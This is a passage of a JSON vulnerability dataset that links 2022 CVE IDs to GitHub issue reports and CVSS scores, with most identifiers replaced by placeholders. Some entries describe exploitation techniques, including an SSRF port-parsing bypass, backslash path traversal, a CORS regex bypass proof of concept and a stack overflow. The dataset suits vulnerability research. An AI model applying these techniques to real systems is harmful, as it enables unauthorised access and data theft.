        "Issue_Url_old": "https://github.com/eclipse/lemminx/issues/1169",
        "Issue_Url_new": "https://github.com/eclipse/lemminx/issues/1169",
        "Repo_new": "eclipse/lemminx",
        "Issue_Created_At": "2022-02-07T10:38:32Z",
        "description": "Bad SYSTEM for DTD APITAG and Entity breaks the XML validation. See URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-0730",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4562",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/4562",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2022-02-21T18:07:52Z",
        "description": "Under certain LDAP server environments, cacti authentication can be bypassed. Describe the bug Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. Expected behavior Cacti security model should work when Anonymous binding is enabled.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-0749",
        "Issue_Url_old": "https://github.com/SinGooCMS/SinGooCMSUtility/issues/1",
        "Issue_Url_new": "https://github.com/singoocms/singoocmsutility/issues/1",
        "Repo_new": "singoocms/singoocmsutility",
        "Issue_Created_At": "2021-12-08T13:29:42Z",
        "description": "Vulnerability Report\uff1a APITAG security vulnerability. Risk PATHTAG FILETAG Set up socket communication server : FILETAG client : FILETAG Constructing the payload The APITAG method internally first calls the APITAG method to read the packet header NUMBERTAG bytes) of the socket object information, and then calls the APITAG method to read the length of the bytes in the packet header (int type) The APITAG method will first intercept NUMBERTAG bytes of information, so NUMBERTAG bytes must be added before the original payload when constructing the POC. The APITAG method reads the packet header information, i.e. the NUMBERTAG bytes of information needs to contain the byte length (int type) of the original payload, while intercepting the int data type before the ' ' ending. Also the Payload source code is converted to a byte array length of NUMBERTAG bytes. A local test of the APITAG method shows that the NUMBERTAG bytes of information could be NUMBERTAG Int NUMBERTAG is the byte length of the original payload. Simulating the transmission of messages to a socket client POC implementation using a controlled data transfer from the server to the socket client, i.e. a set payload. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-0759",
        "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/554",
        "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/554",
        "Repo_new": "manageiq/kubeclient",
        "Issue_Created_At": "2022-03-23T10:28:21Z",
        "description": "VULNERABILITY: Config defaults to APITAG when kubeconfig doesn't specify custom CA. Dangerous bug present ever since APITAG was created URLTAG : Whenever kubeconfig did not define custom CA (normal situation for production clusters with public domain and certificate!), Config was returning ssl_options[:verify_ssl] hard coded to APITAG : ( Assuming you passed those ssl_options to APITAG this means that instead of checking server's certificate against your system CA store, it would accept ANY certificate, allowing easy man in the middle attacks. This is especially dangerous with user/password or token credentials because MITM attacker could simply steal those credentials to the cluster and do anything you could do on the cluster.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-0759",
        "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/555",
        "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/555",
        "Repo_new": "manageiq/kubeclient",
        "Issue_Created_At": "2022-03-23T10:33:18Z",
        "description": "Config ignores APITAG field. Tightly related to NUMBERTAG also broken ever since APITAG was added (I'm fixing them together): APITAG field in kubeconfig was never honored. The distinction is that NUMBERTAG is about the default being dangerous, and this ticket is about inability to override the default (either way) by APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-0856",
        "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/65",
        "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/65",
        "Repo_new": "cacalabs/libcaca",
        "Issue_Created_At": "2022-02-24T09:19:26Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-0918",
        "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/5242",
        "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/5242",
        "Repo_new": "389ds/389-ds-base",
        "Issue_Created_At": "2022-03-30T10:56:03Z",
        "description": "Craft message may crash the server. Issue Description A request containing craft parameters may crash a server Package Version and Platform: all versions Steps to Reproduce Expected results should not crash",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-0981",
        "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/23269",
        "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/23269",
        "Repo_new": "quarkusio/quarkus",
        "Issue_Created_At": "2022-01-28T14:24:04Z",
        "description": "Hibernate Reactive APITAG is closed. Describe the bug This may look similar to NUMBERTAG which was fixed in APITAG ) but this time the reproducer includes a resteasy reactive request filter (see APITAG in the reproducer). Here's the exception which is thrown randomly when the app is processing concurrent requests: ERRORTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? Reproducer: URLTAG Steps to reproduce the behavior: Start the app with APITAG Run FILETAG with APITAG The exception should show up in the log eventually \u2139\ufe0f If you change the Quarkus version to APITAG , the exception should never be thrown. As a consequence, this looks like a regression to us but I'll wait for a confirmation on that specific point before tagging the issue as a regression. Output of ERRORTAG or ver Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Mon No NUMBERTAG EST NUMBERTAG APITAG Output of APITAG openjdk version APITAG NUMBERTAG LTS APITAG version (if different from Java) _No response_ Quarkus version or git rev APITAG Build tool (ie. output of APITAG or APITAG ) _No response_ Additional information _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-0982",
        "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/164",
        "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/164",
        "Repo_new": "xebd/accel-ppp",
        "Issue_Created_At": "2022-01-04T06:09:13Z",
        "description": "Vulnerability Disclosure. Dear accel ppp Development Team, I have filed a vulnerability disclosure by email to dev APITAG APITAG Please let me know when it is patched and we can use this issue for tracking purposes. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-0991",
        "Issue_Url_old": "https://github.com/Admidio/admidio/issues/1238",
        "Issue_Url_new": "https://github.com/admidio/admidio/issues/1238",
        "Repo_new": "admidio/admidio",
        "Issue_Created_At": "2022-03-13T08:12:47Z",
        "description": "Sessions should be invalidated if password was changed. If a user will change his password (e.g. in the profile or with the password forgotten function) we should invalidate all sessions and auto login of the user. This is necessary so the user can be sure that the new password will used everywhere and a compromitted password could not be used in a saved session.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1122",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1368",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1368",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2021-07-13T08:56:46Z",
        "description": "Exist a issues of freeing uninitialized pointer in PATHTAG will cause a segfault. Hi, I found a segmentation fault in current master, and I also reproduced it on latest released version NUMBERTAG Crash Summary\uff1a A issues of freeing uninitialized pointer exist in PATHTAG in main, it can lead to a segmentation fault via the POC provided below Crash Analysis NUMBERTAG run command: ./opj_decompress APITAG input APITAG BMP NUMBERTAG If there are lots of files in the imgdir directory, that will cause memory malloc failure FILETAG NUMBERTAG Then, since the pointer dirptr >filename is not initialized, free(dirptr >filename) is failed FILETAG GDB debugging results\uff1a FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-1209",
        "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/989",
        "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/989",
        "Repo_new": "ultimatemember/ultimatemember",
        "Issue_Created_At": "2022-04-01T12:22:47Z",
        "description": "Security issues in URL and social fields. Isolating the problem (mark completed items with an x]): [x] I have deactivated other plugins and confirmed this bug occurs when only Ultimate Member plugin is active. [x] This bug happens with a default APITAG theme active, or [UM Theme URLTAG . FILETAG Image NUMBERTAG iew mode FILETAG Image NUMBERTAG Edit mode FILETAG Image NUMBERTAG iew mode FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-1211",
        "Issue_Url_old": "https://github.com/tildearrow/furnace/issues/325",
        "Issue_Url_new": "https://github.com/tildearrow/furnace/issues/325",
        "Repo_new": "tildearrow/furnace",
        "Issue_Created_At": "2022-03-29T07:31:17Z",
        "description": "FILETAG I use fuzz tests, so I don't analyze these crashes in detail. I packaged the POC file so you can reproduce the error.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1213",
        "Issue_Url_old": "https://github.com/LiveHelperChat/livehelperchat/issues/1752",
        "Issue_Url_new": "https://github.com/livehelperchat/livehelperchat/issues/1752",
        "Repo_new": "livehelperchat/livehelperchat",
        "Issue_Created_At": "2022-04-03T16:23:58Z",
        "description": "SSRF Filter bypass port NUMBERTAG Recently, i found bypass mechanism only accept port NUMBERTAG with use multi port Beacause php parse url with port is the last of colon, and hostname is \"evil NUMBERTAG FILETAG With the code will ignore url port NUMBERTAG and use \"evil NUMBERTAG as hostname FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1227",
        "Issue_Url_old": "https://github.com/containers/podman/issues/10941",
        "Issue_Url_new": "https://github.com/containers/podman/issues/10941",
        "Repo_new": "containers/podman",
        "Issue_Created_At": "2021-07-15T12:56:50Z",
        "description": "podman top not work with userns=keep id container. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description Steps to reproduce the issue NUMBERTAG top with userns=keep id container ERRORTAG NUMBERTAG top with normal container CODETAG NUMBERTAG Describe the results you received: Describe the results you expected: Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1341",
        "Issue_Url_old": "https://github.com/vgropp/bwm-ng/issues/26",
        "Issue_Url_new": "https://github.com/vgropp/bwm-ng/issues/26",
        "Repo_new": "vgropp/bwm-ng",
        "Issue_Created_At": "2020-04-27T04:26:24Z",
        "description": "Vulnerability? Bug? Null write in the get_cmdln_options function in src/options.c.. Hi, In src/options.c, line NUMBERTAG APITAG may fail, and str will be NULL. str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG write to Null snprintf(str,strlen(pwd_entry >pw_dir NUMBERTAG s/.bwm ng.conf\",pwd_entry >pw_dir); I think this is a vulnerability, and maybe we can patch it as following? str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG if(!str) return Thanks for any consideration! Peiyu Liu, NESA lab, Zhejiang University",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-1441",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2175",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2175",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-04-16T08:21:46Z",
        "description": "GPAC NUMBERTAG APITAG stack overflow with unlimited length and controllable content in APITAG Description When GPAC tries to parse a MP4 file, it calls the function APITAG to read from video. In this funtion, it allocates a buffer str with fixed length. However, content read from bs is controllable by user, so is the length, which causes a buffer overflow. APITAG Impact Since video content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary or even get shell. Mitigation We can just set a length limit to it, making it less than NUMBERTAG byte. See pull request URLTAG . Reproduce On Ubuntu NUMBERTAG make with this. APITAG Run the following command with APITAG APITAG You may get a stack smashing detectde error, which indicates that CANARY is crashed. APITAG GDB CODETAG Credits xdchase",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-1554",
        "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3128",
        "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3128",
        "Repo_new": "clinical-genomics/scout",
        "Issue_Created_At": "2022-02-02T15:47:08Z",
        "description": "Fix crashes and tighten down file access for file endpoint. . When container mounts to expected fs go down, this can happen: ERRORTAG Also, it wouldn't hurt adding some checks for if the user is asking for files belonging to cases they should have access to. It would take quite some guessing of case names etc to access, but it might be possible to combine with some other situation where we feel that info is trivial to show. Also worth glitch checking. \ud83d\ude2c",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-1554",
        "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3302",
        "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3302",
        "Repo_new": "clinical-genomics/scout",
        "Issue_Created_At": "2022-04-19T06:22:15Z",
        "description": "Refactor endpoint so that PATHTAG can't be used without being authenticated. Check the use case from this report: URLTAG Reproduce: APITAG Then `curl path as is ' URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-1592",
        "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3325",
        "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3325",
        "Repo_new": "clinical-genomics/scout",
        "Issue_Created_At": "2022-05-05T05:38:38Z",
        "description": "Server Side Request Forgery (SSRF) in remote_cors . We knew it was coming. Report is here: URLTAG I have no idea how to fix this vulnerability yet. Have to read about SSRF!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-1706",
        "Issue_Url_old": "https://github.com/coreos/ignition/issues/1300",
        "Issue_Url_new": "https://github.com/coreos/ignition/issues/1300",
        "Repo_new": "coreos/ignition",
        "Issue_Created_At": "2022-01-11T14:00:58Z",
        "description": "Security when using vmware to store the ignition config?. We thought that only root should be able to view the config but it turns out any user seems to be able so get the whole config from vmware? APITAG How can we handle secrets in ignition config? For example disk enctyption keys or other sensitivt config for systemd services we declare there?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1706",
        "Issue_Url_old": "https://github.com/coreos/ignition/issues/1315",
        "Issue_Url_new": "https://github.com/coreos/ignition/issues/1315",
        "Repo_new": "coreos/ignition",
        "Issue_Created_At": "2022-01-29T21:54:19Z",
        "description": "Consider deleting userdata from provider after Ignition completes . Feature Request Environment At least GCP, APITAG APITAG Desired Feature Some platforms allow modifying or removing userdata using APIs accessible from the VM instance. On those platforms, consider deleting the Ignition config from the platform after Ignition completes. Other Information Ignition configs may contain sensitive information that should not be accessible from workloads running on the machine. We currently do nothing to help users with sensitive userdata, and there is no documentation about the issue ( URLTAG On platforms with network metadata services, the user can write an Ignition config that firewalls off the metadata service (not documented in Fedora APITAG URLTAG On platforms with in hypervisor metadata accessible by non root users (at least APITAG firewalling isn't an option, and the user must delete the metadata themselves or pursue awkward workarounds like denylisting kernel modules. Various minimalistic fixes are possible. We could publish docs on adding a systemd service that disables userdata access. If an external tool is necessary, we could ship it or recommend adding it to the OS. Or we could recommend that APITAG check the platform ID and disable userdata access themselves. However, we generally try to keep Ignition secure by default. I think it would make sense to delete userdata automatically wherever we have an API to do so. This is most important for platforms that can't be remediated by firewalling, but is still a worthwhile improvement on the others. On platforms where we can't delete userdata, we could log a warning recommending that users firewall or otherwise mitigate their risk. In principle this would be a compatibility break, since it's possible for other software in the instance (or on a VM host) to intentionally access userdata. APITAG would be hacky, since the userdata must be formatted as an Ignition config for Ignition to care about it, but it's conceivable.) If we're concerned about this, we could add an Ignition config field ( APITAG ?) configuring whether Ignition performs the deletion. I think the default should certainly be true after the next major spec bump, but the short term default is less clear, especially for old specs that don't have the field. We'd need to delete userdata after Ignition completes, not after fetch succeeds. There are two reasons: kargs changes may reboot the machine and refetch userdata, and a failed Ignition run may be retried by the OS (since Ignition is mostly idempotent). Platform notes AWS Network metadata service. Userdata can be changed with the APITAG control plane request, but there's no instance side API. Control plane access is probably out of scope for us. Azure On FCOS and RHCOS, Azure userdata access is already disabled at runtime, outside Ignition's control. Azure doesn't allow full access to a VM until it \"checks in\" to report that it has provisioned successfully, and this checkin causes Azure to disable access to the config drive. Checkin is handled by Afterburn, which runs in the initramfs on RHCOS (to avoid long delays for console access) and in the real root on FCOS (for eventual integration with automatic rollback: URLTAG It may or may not make sense to move this into Ignition. APITAG Network metadata service does not appear to support changing userdata. GCP Network metadata service with support for deleting userdata. Some discussion in URLTAG Packet Network metadata service does not appear to support changing userdata. qemu fw_cfg userdata is only accessible by root. Write support was removed in URLTAG We also support config drives on non NUMBERTAG APITAG Guest properties can be modified from inside the guest. They're FILETAG as being accessible only to root, but it still seems useful to remove userdata. APITAG Userdata is accessible by non root users. It can be stored directly in guestinfo or in an XML document in guestinfo, and we'd have to handle both cases. See NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1707",
        "Issue_Url_old": "https://github.com/duracelltomi/gtm4wp/issues/224",
        "Issue_Url_new": "https://github.com/duracelltomi/gtm4wp/issues/224",
        "Repo_new": "duracelltomi/gtm4wp",
        "Issue_Created_At": "2022-05-09T20:42:33Z",
        "description": "No security policy. Hi MENTIONTAG Do you have a private email or contact information for security disclosures? If so, can you add that to your security policy on APITAG Cheers!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1993",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/7002",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/7002",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2022-06-03T13:53:58Z",
        "description": "Path Traversal in Git HTTP endpoints. Describe the bug The report on huntr.dev URLTAG Code of Conduct [X] I agree to follow this project's Code of Conduct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-1996",
        "Issue_Url_old": "https://github.com/emicklei/go-restful/issues/489",
        "Issue_Url_new": "https://github.com/emicklei/go-restful/issues/489",
        "Repo_new": "emicklei/go-restful",
        "Issue_Created_At": "2022-03-29T12:40:35Z",
        "description": "security] Authorization Bypass Through User Controlled Key. MENTIONTAG following on from NUMBERTAG and URLTAG we are sharing the details of the report as requested in the APITAG . Authorization Bypass Through User Controlled Key in [emicklei/go restful URLTAG Reported on Mar NUMBERTAG th NUMBERTAG Description Hello go restful maintainer team, I would like to report a security concerning your CORS Filter feature. Go restful allows user to specify a CORS Filter with a configurable APITAG param which is an array of domains allowed in CORS policy. However, although there's is already another param called APITAG used for matching origin using regular expression, all domains in APITAG is also used as regular expression to check for matching origin in this code in file cors_filter.go: if APITAG NUMBERTAG compile allowed domains to allowed origin patterns APITAG err := APITAG if err != nil { return false } APITAG = APITAG } for _, pattern := range APITAG { if allowed = APITAG allowed { break } } So by this, if the user input example.com to be one of domain in APITAG all domains starting with example.com would be acceptable. Proof of Concept Install go restful and create a file main.go with this content: package main import ( restful PATHTAG \"io\" \"net/http\" ) func APITAG { container := APITAG ws := APITAG APITAG APITAG server := APITAG NUMBERTAG Handler: container} APITAG cors := APITAG APITAG ]string{\"X My Header\"}, APITAG APITAG APITAG true, Container: container, } APITAG APITAG } func hello(req APITAG resp APITAG { APITAG \"world\") } In the above code, example.com is configured as an allowed domain. Run the above code and access link /hello with Origin Header = APITAG and see that the request gets through CORS policy and response looks like this: HTTP NUMBERTAG OK Access Control Allow Credentials: true Access Control Allow Origin: APITAG Access Control Expose Headers: X My Header Date: Mon NUMBERTAG Mar NUMBERTAG GMT Content Length NUMBERTAG Content Type: text/plain; charset=utf NUMBERTAG Connection: close world Impact This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests, retrieve data on behalf of other users. Occurrences [cors_filter.go L NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-2063",
        "Issue_Url_old": "https://github.com/nocodb/nocodb/issues/2262",
        "Issue_Url_new": "https://github.com/nocodb/nocodb/issues/2262",
        "Repo_new": "nocodb/nocodb",
        "Issue_Created_At": "2022-06-04T18:38:08Z",
        "description": "Who to contact for security issues. Hello \ud83d\udc4b I run a security community that finds and fixes vulnerabilities in OSS. A researcher ( APITAG has found a potential issue, which I would be eager to share with you. Could you add a APITAG file with an e mail address for me to send further details to? APITAG recommends URLTAG a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future. Looking forward to hearing from you \ud83d\udc4d (cc APITAG helper)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-21221",
        "Issue_Url_old": "https://github.com/valyala/fasthttp/issues/1226",
        "Issue_Url_new": "https://github.com/valyala/fasthttp/issues/1226",
        "Repo_new": "valyala/fasthttp",
        "Issue_Created_At": "2022-02-21T11:25:44Z",
        "description": "Path Traversal Attacks. Hello, I found a problem when requesting path traversal attacks ( URLTAG If you specify a backslash NUMBERTAG c) character in the path, then you can follow the path /../ and get data from the root. It may be worth adding a check for part of the path /..\\. APITAG = []byte(\"/.. ). At your discretion. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-21646",
        "Issue_Url_old": "https://github.com/authzed/spicedb/issues/358",
        "Issue_Url_new": "https://github.com/authzed/spicedb/issues/358",
        "Repo_new": "authzed/spicedb",
        "Issue_Created_At": "2021-12-31T13:51:57Z",
        "description": "unexpected expand/lookup behaviour with wildcard permissions. Reproduction: URLTAG As I run some experiments with the new wildcard permissions feature, I stumbled upon an apparently unexpected behaviour when doing lookup/expand. Permissions that effectively end up in APITAG behave correctly with Check API, but not with APITAG API (which is presumably what's used in the validation tab in the playground). In the original issue, we discussed that APITAG will have special treatment to APITAG relationship when performing APITAG API, which is reasonable because it would lead to \"listing all users\" phenomenon. However, when APITAG is chained with other algebraic operators like APITAG and APITAG , I think the current implementation semantics seem unexpected. The desirable outcome would be: APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-21672",
        "Issue_Url_old": "https://github.com/lfs-book/make-ca/issues/19",
        "Issue_Url_new": "https://github.com/lfs-book/make-ca/issues/19",
        "Repo_new": "lfs-book/make-ca",
        "Issue_Created_At": "2022-01-08T15:44:30Z",
        "description": "ca bundle.crt includes distrusted certificates. Reported by Robert Bartel via blfs dev, and it also happens on my system: Just recently I noticed that the PATHTAG generated by make ca NUMBERTAG includes two explicitly distrusted certificates as indicated by their comments: APITAG It seems to me that p NUMBERTAG kit and APITAG can explicitly distrust certificates in their CA stores for various usage purposes while the PEM bundle format (ca APITAG used mainly by APITAG does not support this. So my interpretation is that all applications using the bundles will trust these bad certificates. As make ca uses p NUMBERTAG kit's \"trust extract\" utility to generate the PEM bundles, I looked in trust/extract pem.c of p NUMBERTAG kit NUMBERTAG Here it looks like it iterates over all certificates in the CA store and the trust status is only indicated by the generated comment line. But I could be wrong. I'm not wanting to create a APITAG account right now to report the issue to the p NUMBERTAG kit project, so I first ask here if anyone can confirm or reject this? For the time being I resorted to remove the bad certificates by using the following command line: CODETAG Thank you for reading this and keep up the good work!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-21694",
        "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1389",
        "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1389",
        "Repo_new": "onionshare/onionshare",
        "Issue_Created_At": "2021-08-15T16:57:30Z",
        "description": "Use nginx as the web service, instead of flask's APITAG Right now when APITAG starts a web service, it uses APITAG to start it directly in flask. I think instead we should launch an nginx subprocess and use that along with gunicorn to host the flask app. We already have an issue to use gunicorn NUMBERTAG instead of flask directly, and this will be much simpler if we use nginx If we use nginx, we can get gzip for free and don't need to gzip everything and fill up APITAG NUMBERTAG and I suspect we could simplify a lot of the web server code in other ways too If we use nginx, we get simple working range requests NUMBERTAG If we use nginx and implement the download accelerator NUMBERTAG we get much better performance, e.g. quicker download speeds Before implementing this, I'm not sure how a few things will work: Progress bars. If someone downloads a file from nginx, how can we hook into the real time file transfer to make progress bars work? APITAG sharing after files have been sent\". How do we know that the files are finished sending?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-21711",
        "Issue_Url_old": "https://github.com/liyansong2018/elfspirit/issues/1",
        "Issue_Url_new": "https://github.com/liyansong2018/elfspirit/issues/1",
        "Repo_new": "liyansong2018/elfspirit",
        "Issue_Created_At": "2022-01-23T12:32:42Z",
        "description": "Out of bounds read in elf parsing.. poc APITAG log ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-2191",
